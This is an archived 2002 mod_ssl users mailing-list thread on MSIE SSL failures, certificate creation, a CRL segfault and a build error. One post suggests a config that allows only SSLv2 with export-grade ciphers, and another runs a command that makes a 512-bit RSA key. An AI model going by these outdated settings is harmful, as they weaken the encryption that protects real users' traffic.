>All MSIE's do not work (incl. 5.0, 5.5, 6.0x Versions).
>
>Not working means: They work most of the time, but now and then especially
>if the webuser is a minute or more idle the next request gives the infamous
>"page cannot be displayed,  server or dns error" - blaming nonsense.
>
>Of course all standard MSIE workarounds are enabled.
>Also I have found a document via Google with a list of especially
>buggy implemented ciphers and have disabled them all.
>
>But to no avail.
>
>
>Does anybody have any summary for any possible solution to these bugs.
>
>(Yes, I know the only real solution is to not use MSIE, but we cannot force
>every user to use a real webbrowser).
>
>Thanks for your time.
>
>
>  
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 22 15:25:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA19224; Thu, 22 Aug 2002 15:24:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from spyder id PAA19213; Thu, 22 Aug 2002 15:24:04 +0200 (MET DST)
Received: from [127.0.0.1] by spyder
  (ArGoSoft Mail Server Plus, Version 1.6 (1.6.0.0)); Thu, 22 Aug 2002 09:13:36 -0400
Message-ID: <005401c249dd$b900c270$6c41d40a@woburn.com>
From: "Martin Dickau" 
To: 
References: <20020822142241.7c30045e.grover@sitepark.com>
Subject: Re: MSIE Bugs, Summary available ?
Date: Thu, 22 Aug 2002 09:13:28 -0400
Organization: ByAllAccounts
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Martin Dickau" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

http://www.mail-archive.com/modssl-users@modssl.org/msg10542.html

> All MSIE's do not work (incl. 5.0, 5.5, 6.0x Versions).
>
> Not working means: They work most of the time, but now and then especially
> if the webuser is a minute or more idle the next request gives the
infamous
> "page cannot be displayed,  server or dns error" - blaming nonsense.

This sounds a lot like a problem I ran into with 2.7.2 running on Windows
2000.  I reported it in mod_ssl's bugdb as PR #528 (see
http://marc.theaimsgroup.com/?l=apache-modssl&m=98361996627002&w=2 or
http://www.mail-archive.com/modssl-users@modssl.org/msg10542.html ).

This was fixed in 2.8.2, however, but only for Win32 (there's
platform-specific read/write code in io_engine.c).  The basic problem was
that MSIE would somehow cause the socket to appear ready for reading, but
there would be no data yet on the socket.  This was treated as a failure,
and the end result was MSIE's generic DNS error.  The fix was to detect this
case and retry (the logic already existed in another Win32-specific
routine).  See SSL_recvwithtimeout() and/or SSL_writewithtimeout().

You don't say what platform(s) you are running on, but if it's not Win32, I
suppose it's possible that the same problem could be present in the other
platform-specific variations doing I/O. (I have not looked to see if this is
the case).  You could see if a similar change would be appropriate there.

Since implementing this fix about a year and a half ago (we actually ran
with the fix before it was delivered in 2.8.2), we no longer experience this
problem with MSIE.

Good luck,

Martin Dickau, ByAllAccounts
mdickau@byallaccounts.com



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 22 16:32:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA20743; Thu, 22 Aug 2002 16:31:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from aeshna.cynapsis.cy id QAA20739; Thu, 22 Aug 2002 16:31:03 +0200 (MET DST)
Received: from grover by aeshna.cynapsis.cy with local (Exim 3.16 #1)
	id 17hszB-0007oA-00
	for modssl-users@modssl.org; Thu, 22 Aug 2002 16:30:57 +0200
Date: Thu, 22 Aug 2002 16:30:57 +0200
From: Christoph Gröver 
To: modssl-users@modssl.org
Subject: Re: MSIE Bugs, Summary available ?
Message-Id: <20020822163057.3dcb50f8.grover@sitepark.com>
In-Reply-To: <3D64E374.3040004@itaction.co.uk>
References: <20020822142241.7c30045e.grover@sitepark.com>
	<3D64E374.3040004@itaction.co.uk>
Organization: Sitepark GmbH
X-Mailer: Sylpheed version 0.7.8 (GTK+ 1.2.10; i586-pc-linux-gnu)
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Christoph Gröver 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello Peter Viertel.

Thank you for your answer.

I have controlled the session timeout. It is 300 secs for all servers.

I have changed it to 600 secs now. But I believe we had this problem
with far less idle time on the client side (20 secs up to 200 secs).
But we will see if it helps.

On the other side, all MSIE's also fail from time to time when we
are just continousely browsing the site with no pauses at all.
This happens less often, but it happens.


So there may be at least two separate problems.

Greetings.


-- 
Christoph Gröver, grover@sitepark.com
Sitepark, Gesellschaft für Informationsmanagement mbH
Rothenburg 14-16, D-48143 Münster, Telefon (0251) 48265-50
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 22 19:19:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA24534; Thu, 22 Aug 2002 19:18:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tonnant.cnchost.com id TAA24524; Thu, 22 Aug 2002 19:17:14 +0200 (MET DST)
Received: from LAP012 (host-30.whitepj.net [63.145.241.30] (may be forged))
	by tonnant.cnchost.com
	id NAA20209; Thu, 22 Aug 2002 13:17:04 -0400 (EDT)
	[ConcentricHost SMTP Relay 1.14]
From: "Gilles Gros" 
To: 
Subject: RE: MSIE Bugs, Summary available ?
Date: Thu, 22 Aug 2002 10:17:02 -0700
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
In-Reply-To: <005401c249dd$b900c270$6c41d40a@woburn.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Gilles Gros" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Does anyone knows why the fix is only for Win32 platform.
Does it have any sense for Unix platform/

Gilles

> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]On Behalf Of Martin Dickau
> Sent: Thursday, August 22, 2002 6:13 AM
> To: modssl-users@modssl.org
> Subject: Re: MSIE Bugs, Summary available ?
> 
> 
> http://www.mail-archive.com/modssl-users@modssl.org/msg10542.html
> 
> > All MSIE's do not work (incl. 5.0, 5.5, 6.0x Versions).
> >
> > Not working means: They work most of the time, but now and then 
> especially
> > if the webuser is a minute or more idle the next request gives the
> infamous
> > "page cannot be displayed,  server or dns error" - blaming nonsense.
> 
> This sounds a lot like a problem I ran into with 2.7.2 running on Windows
> 2000.  I reported it in mod_ssl's bugdb as PR #528 (see
> http://marc.theaimsgroup.com/?l=apache-modssl&m=98361996627002&w=2 or
> http://www.mail-archive.com/modssl-users@modssl.org/msg10542.html ).
> 
> This was fixed in 2.8.2, however, but only for Win32 (there's
> platform-specific read/write code in io_engine.c).  The basic problem was
> that MSIE would somehow cause the socket to appear ready for reading, but
> there would be no data yet on the socket.  This was treated as a failure,
> and the end result was MSIE's generic DNS error.  The fix was to 
> detect this
> case and retry (the logic already existed in another Win32-specific
> routine).  See SSL_recvwithtimeout() and/or SSL_writewithtimeout().
> 
> You don't say what platform(s) you are running on, but if it's 
> not Win32, I
> suppose it's possible that the same problem could be present in the other
> platform-specific variations doing I/O. (I have not looked to see 
> if this is
> the case).  You could see if a similar change would be appropriate there.
> 
> Since implementing this fix about a year and a half ago (we actually ran
> with the fix before it was delivered in 2.8.2), we no longer 
> experience this
> problem with MSIE.
> 
> Good luck,
> 
> Martin Dickau, ByAllAccounts
> mdickau@byallaccounts.com
> 
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 22 23:05:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA00516; Thu, 22 Aug 2002 23:04:24 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from web20514.mail.yahoo.com id XAA00511; Thu, 22 Aug 2002 23:03:41 +0200 (MET DST)
Message-ID: <20020822210339.13088.qmail@web20514.mail.yahoo.com>
Received: from [209.81.61.234] by web20514.mail.yahoo.com via HTTP; Thu, 22 Aug 2002 14:03:39 PDT
Date: Thu, 22 Aug 2002 14:03:39 -0700 (PDT)
From: David W 
Subject: xsl to xsl redirects
To: modssl-users@modssl.org
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: David W 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,
  This probably isn't the right group for this problem
and its probably just a bug with MSIE but I thought I
would see if anyone else has had this problem. 
Basically I have a link on an XML/XSL generated page
on a http server which sends the user to a local
redirect (either via cgi or mod_rewrite).  The
redirect then sends the browser to a XML/XSL generated
page on a secure https server.
  When an MSIE user (haven't tried other browsers
which support XSL) clicks on the link MSIE fetches the
redirect and fetches the XML from the secure server. 
But then MSIE makes no attempt to fetch the XSL and
returns an error saying 'Cannot view XML input using
style sheet.' (see below).  When the user hits reload,
the browser fetches the redirect again (from the http
server), the XML again (from the https server), and
successfully fetches the XSL (from the https server).

Browser paths:
http:// XML/XSL   --link-->
http:// cgi       --redirect-->
https:// XML/XSL  (Error)

hit reload:
http:// cgi       --redirect-->
https:// XML/XSL  (Success)

Any ideas?
-David Wagner
 dkw9992@yahoo.com


ps.. since I think this is a MSIE bug, I don't think
my webserver config matters.  But for what its worth,
I am using Apache 1.3.26 which modssl 2.8.10.

pps.. I have a work around using meta-refresh, but I
really really would rather not use it.

The error MSIE reports:

The XML page cannot be displayed 
Cannot view XML input using style sheet. Please
correct the error and then click the Refresh button,
or try again later. 


--------------------------------------------------------------------------------

Access is denied. Error processing resource
'http://localhost/redirect/b.cgi'. 
 




__________________________________________________
Do You Yahoo!?
HotJobs - Search Thousands of New Jobs
http://www.hotjobs.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 23 04:38:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id EAA10108; Fri, 23 Aug 2002 04:37:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from itahost1.ita.org.mo id EAA10104; Fri, 23 Aug 2002 04:36:48 +0200 (MET DST)
From: EdwardSPL@ita.org.mo
Received: from ita.org.mo (c52line166.dialup2.ctm.net [202.175.37.167])
	by itahost1.ita.org.mo (8.9.3/8.9.3) with ESMTP id KAA22270
	for ; Fri, 23 Aug 2002 10:19:43 +0800
Message-ID: <3D659FA2.34787CC9@ita.org.mo>
Date: Fri, 23 Aug 2002 10:36:18 +0800
X-Mailer: Mozilla 4.7 [en] (WinNT; I)
X-Accept-Language: en,zh-TW
MIME-Version: 1.0
To: OpenSSL 
Subject: Create Security Certificate with Webmin / Usermin
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: EdwardSPL@ita.org.mo
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I have ever visited http://www.webmin.com/faq.html and question 14, then
I run the following commands :

1,openssl req -newkey rsa:512 -x509 -nodes -out cert.pem
2, cat privkey.pem cert.pem > /etc/webmin/miniserv.pem
3,openssl genrsa -out key.pem 1024
4,openssl req -new -key key.pem -out req.pem
5,cat key.pem cert.pem > /etc/webmin/miniserv.pem

to create our own security certificate, but I found I can't to define
the key version, the size ( eg : 1024 Bits )
of key and the valid date of key etc !
So, can you help me to solve this problem ?

Thank a lots.



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 23 05:06:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id FAA10789; Fri, 23 Aug 2002 05:05:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ALPHA9.CC.MONASH.EDU.AU id FAA10774; Fri, 23 Aug 2002 05:04:57 +0200 (MET DST)
Received: from thwack.its.monash.edu.au ([130.194.1.72])
 by vaxh.cc.monash.edu.au (PMDF V5.2-31 #39306)
 with ESMTP id <01KLMZI43QL68ZV9W3@vaxh.cc.monash.edu.au> for
 modssl-users@modssl.org; Fri, 23 Aug 2002 13:04:36 +1000
Received: from thwack (unknown [127.0.0.1])	by localhost (Postfix)
 with ESMTP	id CA21012C005; Fri, 23 Aug 2002 13:04:35 +1000 (EST)
Received: from its.monash.edu.au (carboncopy.its.monash.edu.au [130.194.2.239])
	by thwack.its.monash.edu.au (Postfix) with ESMTP	id E57BD12C005; Fri,
 23 Aug 2002 13:04:30 +1000 (EST)
Date: Fri, 23 Aug 2002 13:04:29 +1000
From: Leslie Liew 
Subject: bug handling next update in CRLs
X-Sender: "Leslie Liew" 
To: modssl-users@modssl.org
Message-id: <3D65A63D.DC401D94@its.monash.edu.au>
Organization: Monash University
MIME-version: 1.0
X-Mailer: Mozilla 4.79 [en]C-CCK-MCD monwin/025  (Win98; U)
Content-type: multipart/signed; protocol="application/x-pkcs7-signature";
 micalg=sha1; boundary="------------ms32464F2B7EC1CC8AAF500817"
X-Accept-Language: en
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Leslie Liew 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a cryptographically signed message in MIME format.

--------------ms32464F2B7EC1CC8AAF500817
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Hi,

The problem encountered was found using Apache and mod_ssl.
Apache/1.3.26 (Unix) mod_ssl/2.8.9 OpenSSL/0.9.6c
Only when using a CRL (without next update) apache would cause a 
Segmentation Fault.

mod_ssl calls an openssl library to do a date comparison on next update.
using httpd -X -DSSL, I was able to use gdb to trace the fault.

I have tried openssl support and they believe the problem is in the 
function ssl_callback_SSLVerify_CRL().

Is it possible to fix to handle this CRL?

[ while i was attempting to log a bug request I also noticed that the
bug datadase link is broken

Included is the gdb backtrace and the openssl contents of the crl.

(gdb) backtrace
#0  0x13e574 in X509_cmp_time ()
#1  0x377d4 in ssl_callback_SSLVerify_CRL ()
#2  0x373ac in ssl_callback_SSLVerify ()
#3  0x13e520 in internal_verify ()
#4  0x13e108 in X509_verify_cert ()
#5  0xf7d50 in ssl_verify_cert_chain ()
#6  0x106250 in ssl3_get_client_certificate ()
#7  0x10410c in ssl3_accept ()
#8  0xf1198 in ssl23_get_client_hello ()
#9  0xf0924 in ssl23_accept ()
#10 0x348e8 in ssl_hook_NewConnection ()
#11 0x96424 in new_connection ()
#12 0x97838 in child_main ()
#13 0x97b2c in make_child ()
#14 0x97d2c in startup_children ()
#15 0x9864c in standalone_main ()
#16 0x99264 in main ()

The contents of the CRL:
openssl crl -noout -text -in monash-dirslave1.crl
Certificate Revocation List (CRL):
        Version 1 (0x0)
        Signature Algorithm: sha1WithRSAEncryption
        Issuer: /C=AU/O=Monash University/CN=Development Certificate
Manager
        Last Update: Jul 19 07:23:05 2002 GMT
        Next Update: NONE
Revoked Certificates:
    Serial Number: 2C
        Revocation Date: Jul 19 03:06:02 2002 GMT
    Serial Number: 2B
        Revocation Date: Jun 19 06:01:21 2002 GMT
    Serial Number: 29
        Revocation Date: Jun 17 05:24:35 2002 GMT
    Serial Number: 26
        Revocation Date: Jun 17 03:27:03 2002 GMT
    Serial Number: 24
        Revocation Date: Jun 19 01:22:20 2002 GMT
    Serial Number: 23
        Revocation Date: Jun  3 04:47:16 2002 GMT
    Serial Number: 21
        Revocation Date: Jun  3 04:16:07 2002 GMT
    Serial Number: 20
        Revocation Date: May 28 23:46:50 2002 GMT
    Serial Number: 1F
        Revocation Date: Jun 10 23:19:16 2002 GMT
    Serial Number: 17
        Revocation Date: Jun 19 01:31:23 2002 GMT
    Serial Number: 10
        Revocation Date: May 28 04:52:58 2002 GMT
    Serial Number: 0F
        Revocation Date: Apr 16 04:53:43 2002 GMT
    Serial Number: 0E
        Revocation Date: Apr 16 04:12:06 2002 GMT
    Serial Number: 0D
        Revocation Date: Apr 16 04:04:33 2002 GMT
    Serial Number: 0C
        Revocation Date: Apr 16 01:38:55 2002 GMT
    Serial Number: 0B
        Revocation Date: May 28 02:16:08 2002 GMT
    Serial Number: 0A
        Revocation Date: Apr 24 00:31:46 2002 GMT
    Serial Number: 09
        Revocation Date: May 28 04:32:49 2002 GMT
    Serial Number: 08
        Revocation Date: Mar 27 22:15:00 2002 GMT
    Signature Algorithm: sha1WithRSAEncryption
        19:d0:a5:1f:67:bf:ca:4b:69:d3:e0:ee:69:f9:45:4f:44:22:
        5c:4e:7f:98:be:84:df:2e:d9:85:09:c4:7b:8a:6a:63:9c:ea:
        b0:3c:ba:58:f5:c9:85:d8:e0:07:d8:41:96:07:f6:e4:15:f4:
        4f:da:cc:1b:e7:4b:5a:80:49:8b:c7:00:c3:27:d2:2e:69:18:
        4b:85:06:13:ac:bf:20:fb:4f:fb:89:d5:0e:a8:47:4e:37:2d:
        7b:10:8f:e6:b9:b3:77:5c:4d:a6:61:46:36:e2:88:21:49:5b:
        72:c4:09:0c:b5:97:44:e5:be:13:a1:3b:70:e5:83:c3:ed:26:
        c2:c1

--
Leslie Liew
Directory Assistant, Infrastructure Services
Information Technology Services, Monash University - Clayton
Phone: +61 3 990 54542
--------------ms32464F2B7EC1CC8AAF500817
Content-Type: application/x-pkcs7-signature; name="smime.p7s"
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature
Content-Transfer-Encoding: base64

MIIEqQYJKoZIhvcNAQcCoIIEmjCCBJYCAQExCzAJBgUrDgMCGgUAMAsGCSqGSIb3DQEHAaCC
AsowggLGMIICL6ADAgECAgEzMA0GCSqGSIb3DQEBBQUAMEgxCzAJBgNVBAYTAkFVMRowGAYD
VQQKExFNb25hc2ggVW5pdmVyc2l0eTEdMBsGA1UEAxMUTW9uYXNoIFVuaXZlcnNpdHkgQ0Ew
HhcNMDIwNTIyMDcyNzU1WhcNMDMwNTIyMDcyNzU1WjCBlzELMAkGA1UEBhMCYXUxGjAYBgNV
BAoTEU1vbmFzaCBVbml2ZXJzaXR5MSgwJgYDVQQLEx9JbmZvcm1hdGlvbiBUZWNobm9sb2d5
IFNlcnZpY2VzMRQwEgYDVQQDEwtMZXNsaWUgTGlldzEsMCoGCSqGSIb3DQEJARYdTGVzbGll
LkxpZXdAaXRzLm1vbmFzaC5lZHUuYXUwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAM8v
u4b6cz2FAbMCfzWfaTRJV4rgw79/xI5bwJufklA7vtxvycWx3XWmn1yvTSEsriXnKSyhNX8H
yltLpowq8k/S6/KvS/jCbDgB0L4rJC8/ISKNDkT3cYDVjT73fIl9NtuN+tgtrkJrFWQ6FJLS
Ci8APibGMOHcVRWSrv6da7HxAgMBAAGjcDBuMBEGCWCGSAGG+EIBAQQEAwIFoDAOBgNVHQ8B
Af8EBAMCBsAwKAYDVR0RBCEwH4EdTGVzbGllLkxpZXdAaXRzLm1vbmFzaC5lZHUuYXUwHwYD
VR0jBBgwFoAUcP8lgkB1Wf0OfK2hjvTNZBGlB+4wDQYJKoZIhvcNAQEFBQADgYEAdCMahMyu
vzU4bUBDXe9L3ySnksRhVEvL09Q7fQLK5GP7y0VOuie3v4XgGMmAxulHKBy6AgkaclulH4im
+iy70L62k78FhJrISeNOebUx43cABKgQyuEp3dI8tD5/yFigfsj0/p2b35pI6B4re36zulh4
+LXIOrXD6yDGy7YE5ngxggGnMIIBowIBATBNMEgxCzAJBgNVBAYTAkFVMRowGAYDVQQKExFN
b25hc2ggVW5pdmVyc2l0eTEdMBsGA1UEAxMUTW9uYXNoIFVuaXZlcnNpdHkgQ0ECATMwCQYF
Kw4DAhoFAKCBsTAYBgkqhkiG9w0BCQMxCwYJKoZIhvcNAQcBMBwGCSqGSIb3DQEJBTEPFw0w
MjA4MjMwMzA0MjlaMCMGCSqGSIb3DQEJBDEWBBQFaLKnN5xvvDsTXOWrarvSClOshjBSBgkq
hkiG9w0BCQ8xRTBDMAoGCCqGSIb3DQMHMA4GCCqGSIb3DQMCAgIAgDAHBgUrDgMCBzANBggq
hkiG9w0DAgIBQDANBggqhkiG9w0DAgIBKDANBgkqhkiG9w0BAQEFAASBgH2LN5nD/KXrdO95
+EPLr+hIey6/L0fStQkLrbysZdlXiFVJU9O0hKkUiIBAZPyJZsNK48atG0ACnRbxMWGaTwiK
isEGNl3WSU9HFelkuOPtcL77ifpJBjTH48mK5KdBNcGBwL6LHlgvaR6dDAsXbvfpV52nQjta
sLck1Q/y8f1o
--------------ms32464F2B7EC1CC8AAF500817--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 23 06:25:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA12980; Fri, 23 Aug 2002 06:24:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mail.extromedia.net id GAA12976; Fri, 23 Aug 2002 06:23:47 +0200 (MET DST)
Received: (qmail 24206 invoked from network); 23 Aug 2002 04:14:53 -0000
Received: from ns1.extromedia.net (HELO borg.extromedia.net) (192.168.0.1)
  by 192.168.0.3 with SMTP; 23 Aug 2002 04:14:53 -0000
Subject: How to work-around Apache, mod_ssl and MSIE problems
From: "Robert J. Pope" 
To: modssl-users@modssl.org
In-Reply-To: 
	
References: 
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Ximian Evolution 1.0.8 
Date: 23 Aug 2002 00:22:27 -0400
Message-Id: <1030076547.1025.33.camel@borg.extromedia.net>
Mime-Version: 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Robert J. Pope" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I have yet to see a definitive fix for all of the MSIE problems there
are, prior to version 6.0 on both the Mac and PC. So I'd like to share
my experiences with you since this is the hot topic this week.

I don't know if this is really the thing to do, but I've tried a few
things to workaround the problems with SSL handshaking (which I think
this is the problem most people have). Basically, if you can detect the
browser type by reading the server variable USER_AGENT, then can you set
up another SSL port (ex. https://:4433) to handle these "broken"
browsers using a regular expression (ex./MSIE 5/).

Your web app will have to handle the browser detection and re-direction
from port 80 (or whatever non-SSL port) to the custom SSL port. Then, in
httpd.conf, add something like this: 

------------------>8 Cut Here 8<------------------ 
 
        DocumentRoot /path/to/website 
        ServerName www.website.com

        # Add logging config here 


        SSLEngine On 

        # Only enable SSLv2 here, because the rest is broken. 
        SSLProtocol -ALL +SSLv2 
        SSLOptions +CompatEnvVars +OptRenegotiate 
        SSLCipherSuite SSLv2:+HIGH:+MEDIUM:+LOW:+EXP 
        BrowserMatch ".*MSIE.*" nokeepalive ssl-unclean-shutdown
downgrade-1.0 force-response-1.0 

        # Change the two paths below as necessary 
        SSLCertificateFile /etc/httpd/conf/ssl.crt/server.crt 
        SSLCertificateKeyFile /etc/httpd/conf/ssl.key/server.key 
 
------------------>8 Cut Here 8<------------------ 

I know SSLv2 is not ideal, but SSLv3 doesn't work in some of these
browsers.

There may be a more elegant way of doing this with mod_rewrite, but I
haven't invested the time into it at this point.

I've had success with MSIE 5.14 on a Mac with OS X and MSIE 5.0 on
Win98, and a few other ones which are broken on a default OS
installation. Basically, it allows you to handle SSL modes per browser
by using the USER_AGENT server var, without requiring your site visitors
to upgrade to the latest version of IE, or reconfiguring their security
settings. Experiment with it. If you can get other encryption modes to
work, let us all know. Remember this: "Use at your own risk". Try it out
on a non-production server first of course.

I think this may help those who've come across broken Internet Explorer
browsers. Just from my own experience, the version which comes with
Windows 98 (Mozilla/4.0 compatible; MSIE 5.0; Windows 98; DigExt) is
still very popular, in wide circulation and very broken.

Hope this helps you all!

- Robert



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 23 10:23:29 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA18213; Fri, 23 Aug 2002 10:22:29 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bru5-smtp-out2.be.uu.net id KAA18199; Fri, 23 Aug 2002 10:21:32 +0200 (MET DST)
Received: from srv-smtpout-pln1. (uu194-7-83-132.unknown.uunet.be [194.7.83.132])
	by bru5-smtp-out2.be.uu.net (8.11.6/8.11.2) with SMTP id g7N8LVR00071
	for ; Fri, 23 Aug 2002 10:21:31 +0200 (MET DST)
Received: from beela002.DLLife.net ([130.4.111.90])
 by srv-smtpout-pln1. (NAVGW 2.5.1.2) with SMTP id M2002082310050928991
 for ; Fri, 23 Aug 2002 10:05:09 +0200
From: erwin.vogeleer@deltalloydLife.be
Subject: Installing apache
To: modssl-users@modssl.org
X-Mailer: Lotus Notes Release 5.0.4  June 8, 2000
Message-ID: 
Date: Fri, 23 Aug 2002 10:22:40 +0200
X-MIMETrack: Serialize by Router on srv-ln-pln1/DeltaLloydLife(Release 5.0.10 |March 22, 2002) at
 23/08/2002 10:22:41
MIME-Version: 1.0
Content-type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: erwin.vogeleer@deltalloydLife.be
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Dear,

While configuring mod_ssl I get:

Configuring mod_ssl/2.8.10 for Apache/1.3.26
 + Apache location: ../apache_1.3.26 (Version 1.3.26)
 + OpenSSL location: ../openssl-0.9.6g
 + MM location: ../mm-1.2.1
 + Auxiliary patch tool: ./etc/patch/patch (local)
./configure:Error: Building of 'patch' tool failed:
------------------------------------------------------------
patch/util.c
tar: patch/util.c: Cannot open: No such file or directory
patch/util.h
tar: patch/util.h: Cannot open: No such file or directory
patch/version.c
tar: patch/version.c: Cannot open: No such file or directory
patch/version.h
tar: patch/version.h: Cannot open: No such file or directory
tar: Error exit delayed from previous errors
make: *** No targets specified and no makefile found.  Stop.



I use the command:

./configure --with-apache=../apache_1.3.26 --with-ssl=../openssl-0.9.6g
--with-mm=../mm-1.2.1 prefix=/app/apache --enable-module=so

from the mod_ssl directory (/app/mod_ssl-2.8.10-1.3.26)

The path or file '/etc/patch/patch' doesn't exist on my system.
I have the c compilor gcc (/usr/bin/gcc). This path is also included in the
$PATH variable.

Thus anyone have an idea of wath this can be?


Thx


Erwin


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 23 10:35:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA18609; Fri, 23 Aug 2002 10:34:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0a.swx.com id KAA18600; Fri, 23 Aug 2002 10:33:53 +0200 (MET DST)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0a.swx.com (8.9.3+Sun/8.9.3) with ESMTP id KAA04980
	for ; Fri, 23 Aug 2002 10:33:52 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0a.unix.swx.ch (8.9.3+Sun/8.9.3) with ESMTP id KAA10949
	for ; Fri, 23 Aug 2002 10:33:52 +0200 (MEST)
X-Authentication-Warning: gate0a.unix.swx.ch: iscan owned process doing -bs
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: RE: Installing apache
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Date: Fri, 23 Aug 2002 10:33:51 +0200
Message-ID: <14D1193E30E0894D8A773957C0AEE24A01EE01F9@SOMEXEVS001.ex.ordersx.org>
Thread-Topic: Installing apache
